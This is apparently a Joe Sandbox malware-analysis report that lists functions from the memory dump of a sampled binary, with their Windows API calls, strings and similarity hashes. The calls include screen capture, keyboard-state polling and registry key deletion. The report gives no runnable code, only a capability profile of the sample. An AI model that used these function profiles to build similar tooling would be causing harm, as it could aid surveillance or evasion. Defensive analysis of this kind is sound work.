Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 745021a09f1797f305d4c73117bce6731659031d111a7c360b47c3359fb6294d
Instruction ID: 20b06ffa2fae70345de268af167d94592ba370c113ad0f8322a24c0868c83a6e
Opcode Fuzzy Hash: 745021a09f1797f305d4c73117bce6731659031d111a7c360b47c3359fb6294d
Instruction Fuzzy Hash: 66C19C34226201AFD716DF14C4A4F6ABBE5BF89304F15899CE4568B6E2CB35EC46CF81

Function 0031A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

GetSystemMetrics.USER32(0000000F), ref: 0031A990
GetSystemMetrics.USER32(00000011), ref: 0031A9A7
GetSystemMetrics.USER32(00000004), ref: 0031A9B3
GetSystemMetrics.USER32(0000000F), ref: 0031A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0031AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0031AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0031AC54
ShowWindow.USER32(00000003,00000000), ref: 0031AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 0031AC95
DefDlgProcW.USER32(?,00000005,?), ref: 0031ACBB

Strings

(5, xrefs: 0031A95B
@, xrefs: 0031ABD0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(5
API String ID: 3962739598-1822942255
Opcode ID: 540bcef650585316f73d2082fea49b5c37f9cb431c3db7b78298befb4480a675
Instruction ID: 97d05e4d247a1d9cfe3b55d198270058f611e788f95ca8ddef9730626b003152
Opcode Fuzzy Hash: 540bcef650585316f73d2082fea49b5c37f9cb431c3db7b78298befb4480a675
Instruction Fuzzy Hash: 59B18971601619DFCF1ACF68C9847EE7BF2BF48702F198069EC45EA295D770A980CB91

Function 0031976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003197B6
GetFocus.USER32 ref: 003197C6
GetDlgCtrlID.USER32(00000000), ref: 003197D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00319879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0031992B
GetMenuItemCount.USER32(?), ref: 00319948
GetMenuItemID.USER32(?,00000000), ref: 00319958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0031998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003199CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003199FD

Strings

(5, xrefs: 00319779
0, xrefs: 003198FB

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(5
API String ID: 1026556194-2161062916
Opcode ID: b7b18b95e96b0a389deeea0ab0b648193215fe65cd6fb340a7151ebae03aa05b
Instruction ID: ddabb43da76038a776cd3d1cf7f4d97e73391ba08edf29a39dcb8436bb458628
Opcode Fuzzy Hash: b7b18b95e96b0a389deeea0ab0b648193215fe65cd6fb340a7151ebae03aa05b
Instruction Fuzzy Hash: 89819A715043119FD71ACF24C894AEBBBE8BF8E314F05491EF98597291DB30D985CBA2

Function 00302FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00303035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00303045
CreateCompatibleDC.GDI32(?), ref: 00303051
SelectObject.GDI32(00000000,?), ref: 0030305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003030CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00303109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0030312D
SelectObject.GDI32(?,?), ref: 00303135
DeleteObject.GDI32(?), ref: 0030313E
DeleteDC.GDI32(?), ref: 00303145
ReleaseDC.USER32(00000000,?), ref: 00303150

Strings

(, xrefs: 003030EA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0385bcc3a95f1da7d1f08c48c102f4afc924fec8d65ec1646457b7c3fb387dfe
Instruction ID: b71d752d12f73a459829ce52ef8bce925dde462b20a773a936901ad200a2e5fd
Opcode Fuzzy Hash: 0385bcc3a95f1da7d1f08c48c102f4afc924fec8d65ec1646457b7c3fb387dfe
Instruction Fuzzy Hash: 3361D275D01219EFCF05CFA4D884AAEBBBAFF4C310F208529E55AA7250D775AA41CF90

Function 002E52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 002E52E6
GetWindowTextW.USER32(?,?,00000400), ref: 002E5328
_wcslen.LIBCMT ref: 002E5339
CharUpperBuffW.USER32(?,00000000), ref: 002E5345
_wcsstr.LIBVCRUNTIME ref: 002E537A
GetClassNameW.USER32(00000018,?,00000400), ref: 002E53B2
GetWindowTextW.USER32(?,?,00000400), ref: 002E53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 002E5445
GetClassNameW.USER32(?,?,00000400), ref: 002E5477
GetWindowRect.USER32(?,?), ref: 002E54EF

Strings

ThumbnailClass, xrefs: 002E53BD, 002E5450

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: f83667c988ed97ccb655035b9209cc09b233fe6cfc6b941367179b8596872138
Instruction ID: fdcbe4d214376119bfb62678006d95b52d94e8037cb89030a98629328577d024
Opcode Fuzzy Hash: f83667c988ed97ccb655035b9209cc09b233fe6cfc6b941367179b8596872138
Instruction Fuzzy Hash: 4D913671174B57AFD709DF25C884BAAB7A9FF05308F80451DFA8A82081EB31ED65CB91

Function 002EC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(003529C0,000000FF,00000000,00000030), ref: 002EC973
SetMenuItemInfoW.USER32(003529C0,00000004,00000000,00000030), ref: 002EC9A8
Sleep.KERNEL32(000001F4), ref: 002EC9BA
GetMenuItemCount.USER32(?), ref: 002ECA00
GetMenuItemID.USER32(?,00000000), ref: 002ECA1D
GetMenuItemID.USER32(?,-00000001), ref: 002ECA49
GetMenuItemID.USER32(?,?), ref: 002ECA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002ECAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002ECAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002ECB0C

Strings

0, xrefs: 002EC904

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: a465202eb73b794fb565d4e6b682f04e8652035efa981e472beddcedf37cfb77
Instruction ID: 8a83e3bd3b2c6b8454d1cb1f5c487e3ceb15c43d216f32071104f9ceb899b3c3
Opcode Fuzzy Hash: a465202eb73b794fb565d4e6b682f04e8652035efa981e472beddcedf37cfb77
Instruction Fuzzy Hash: C961A57096028AAFDF11CFA5CC49AFE7B79FB06348F644029E911A3251D774AD22CB70

Function 002EE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 002EE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002EE4FA
_wcslen.LIBCMT ref: 002EE504
_wcsstr.LIBVCRUNTIME ref: 002EE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002EE570

Strings

StringFileInfo\, xrefs: 002EE543
\VarFileInfo\Translation, xrefs: 002EE568
%u.%u.%u.%u, xrefs: 002EE64E
DefaultLangCodepage, xrefs: 002EE5D3
04090000, xrefs: 002EE5A6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 0bb1bd88c9aa5c62c13fe8816ead6e50ebbeccc8d1f5f746894e46692f197139
Instruction ID: 0470597b384caadc80e06a451e56022f330e130453b2f5119b78d5643e41c966
Opcode Fuzzy Hash: 0bb1bd88c9aa5c62c13fe8816ead6e50ebbeccc8d1f5f746894e46692f197139
Instruction Fuzzy Hash: E64147726602147BEF01BB758C87EFF37ACDF56710F400059F904A60C2EFB5AA219AA4

Function 0030D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0030D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0030D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0030D7A8

Part of subcall function 0030D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0030D70A
Part of subcall function 0030D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0030D71D
Part of subcall function 0030D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0030D72F
Part of subcall function 0030D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0030D765
Part of subcall function 0030D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0030D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 0030D753

Strings

advapi32.dll, xrefs: 0030D718
RegDeleteKeyExW, xrefs: 0030D729

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f169c6813865b18fdb1b5795fce55eb888d43aa1ad14bd0743b87bfab7fd5edd
Instruction ID: 9dc8218c041379af02c0d150e30ab3045871a9d8aa4e09ea5b9e77a21d2af921
Opcode Fuzzy Hash: f169c6813865b18fdb1b5795fce55eb888d43aa1ad14bd0743b87bfab7fd5edd
Instruction Fuzzy Hash: 5A318671902129BBD7229F90DC98EFFBBBCEF4A750F014165F806E3140DB749E459AA0

Function 002EEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 002EEFCB

Part of subcall function 0029F215: timeGetTime.WINMM(?,?,002EEFEB), ref: 0029F219

Sleep.KERNEL32(0000000A), ref: 002EEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 002EF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002EF03E
SetActiveWindow.USER32 ref: 002EF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002EF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 002EF08A
Sleep.KERNEL32(000000FA), ref: 002EF095
IsWindow.USER32 ref: 002EF0A1
EndDialog.USER32(00000000), ref: 002EF0B2

Strings

BUTTON, xrefs: 002EF030

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 80fe4d6a5c83fe04867397df0dd64d5d11b61a9074539039a4744b0724c64b46
Instruction ID: 67c030fe76df3862b5e92ce81cd867dcd14a6a757c1489e90a0971539d2284a8
Opcode Fuzzy Hash: 80fe4d6a5c83fe04867397df0dd64d5d11b61a9074539039a4744b0724c64b46
Instruction Fuzzy Hash: 2421C3752A0345BFE7536F22ECC9B667B6EF74A786F804038F50182272DB758D24CA11

Function 002EF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002EF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002EF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002EF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002EF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002EF3BE

Strings

alias PlayMe, xrefs: 002EF34D
status PlayMe mode, xrefs: 002EF36F
play PlayMe wait, xrefs: 002EF3A8
open , xrefs: 002EF323
close PlayMe, xrefs: 002EF385, 002EF3B2
play PlayMe, xrefs: 002EF3B9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: ef1c16703d21511d9a86dc20bf65fcaa22b147c8d702bc8c918c900faa651801
Instruction ID: 8b99a42f62b85b7c8a180d0124e24dd7dc9b9caf20fc617c5ac31fec8a5942bf
Opcode Fuzzy Hash: ef1c16703d21511d9a86dc20bf65fcaa22b147c8d702bc8c918c900faa651801
Instruction Fuzzy Hash: D2110635AA119939D721B762CC0AEFF6BBCEBD2B00F40046AB401E60D0DFA02D54CAB0

Function 002B2FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002B3007

Part of subcall function 002B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,002BDB51,00351DC4,00000000,00351DC4,00000000,?,002BDB78,00351DC4,00000007,00351DC4,?,002BDF75,00351DC4), ref: 002B2D4E
Part of subcall function 002B2D38: GetLastError.KERNEL32(00351DC4,?,002BDB51,00351DC4,00000000,00351DC4,00000000,?,002BDB78,00351DC4,00000007,00351DC4,?,002BDF75,00351DC4,00351DC4), ref: 002B2D60

_free.LIBCMT ref: 002B3013
_free.LIBCMT ref: 002B301E
_free.LIBCMT ref: 002B3029
_free.LIBCMT ref: 002B3034
_free.LIBCMT ref: 002B303F
_free.LIBCMT ref: 002B304A
_free.LIBCMT ref: 002B3055
_free.LIBCMT ref: 002B3060
_free.LIBCMT ref: 002B306E

Strings

&2, xrefs: 002B2FFE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &2
API String ID: 776569668-4013442616
Opcode ID: 37bba728ce644f2889d95fc4f12928b1aa715e35e63df4b8931fc2e50ae59753
Instruction ID: 165cf0abc2501c2d38d00521ba27aa320d17ab21d22acf1d7333189d7dc06ce3
Opcode Fuzzy Hash: 37bba728ce644f2889d95fc4f12928b1aa715e35e63df4b8931fc2e50ae59753
Instruction Fuzzy Hash: 87118976620209FFCB01EF94C942DDD3BA5EF09390B9189A5F9089F122D631EE659F90

Function 002EA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 002EA9D9
SetKeyboardState.USER32(?), ref: 002EAA44
GetAsyncKeyState.USER32(000000A0), ref: 002EAA64
GetKeyState.USER32(000000A0), ref: 002EAA7B
GetAsyncKeyState.USER32(000000A1), ref: 002EAAAA
GetKeyState.USER32(000000A1), ref: 002EAABB
GetAsyncKeyState.USER32(00000011), ref: 002EAAE7
GetKeyState.USER32(00000011), ref: 002EAAF5
GetAsyncKeyState.USER32(00000012), ref: 002EAB1E
GetKeyState.USER32(00000012), ref: 002EAB2C
GetAsyncKeyState.USER32(0000005B), ref: 002EAB55
GetKeyState.USER32(0000005B), ref: 002EAB63

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 6c0ae7acadc84b800b48e4d4dbb22a990ddf0ff8bf5ba481b804a5d5400928c1
Instruction ID: cd93e4a8da559a9a40bfcd2c8d205b3c02f82dd749825c4c2340b5de74e91826
Opcode Fuzzy Hash: 6c0ae7acadc84b800b48e4d4dbb22a990ddf0ff8bf5ba481b804a5d5400928c1
Instruction Fuzzy Hash: 485107209547C529EB31DBA28950BEABFB55F12340F88459DC5C21A1C3DA64AB5CCB63

Function 002E662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 002E6649
GetWindowRect.USER32(00000000,?), ref: 002E6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002E66C0
GetDlgItem.USER32(?,00000002), ref: 002E66D0
GetWindowRect.USER32(00000000,?), ref: 002E66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 002E6736
GetDlgItem.USER32(?,000003E9), ref: 002E6744
GetWindowRect.USER32(00000000,?), ref: 002E6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 002E6798
GetDlgItem.USER32(?,000003EA), ref: 002E67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002E67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 002E67CE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 34928a2aef95d6b61ac96285d75fa34e804f09b236ce7fc13f9d8c32417c8fb1
Instruction ID: 4de0cba712ed52da22f2e60c5e44138fcfafce79cd40d93d3191becfc933f710
Opcode Fuzzy Hash: 34928a2aef95d6b61ac96285d75fa34e804f09b236ce7fc13f9d8c32417c8fb1
Instruction Fuzzy Hash: 64515170B50215AFDF08CF69DD89AAEBBB9FB49314F508128F919E7290D7749D10CB50

Function 00282128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00282234: GetWindowLongW.USER32(?,000000EB), ref: 00282242

GetSysColor.USER32(0000000F), ref: 00282152

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c2778bcef58fe4e62eb7d500db8843a72faca82b8bafe6380d20570f4644b5c8
Instruction ID: c8677d47dc573db8c751b9e501daf67a12b690b3554086e489acf57828ea5180
Opcode Fuzzy Hash: c2778bcef58fe4e62eb7d500db8843a72faca82b8bafe6380d20570f4644b5c8
Instruction Fuzzy Hash: 83412735111241EFDB21AF388C48FB93779AB06330F248618FAB6872E2C7318D66DB10

Function 002813A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002C28D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002C28EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002C28FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002C2912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002C2933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002811F5,00000000,00000000,00000000,000000FF,00000000), ref: 002C2942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002C295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002811F5,00000000,00000000,00000000,000000FF,00000000), ref: 002C296E

Strings

(5, xrefs: 002C2885

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
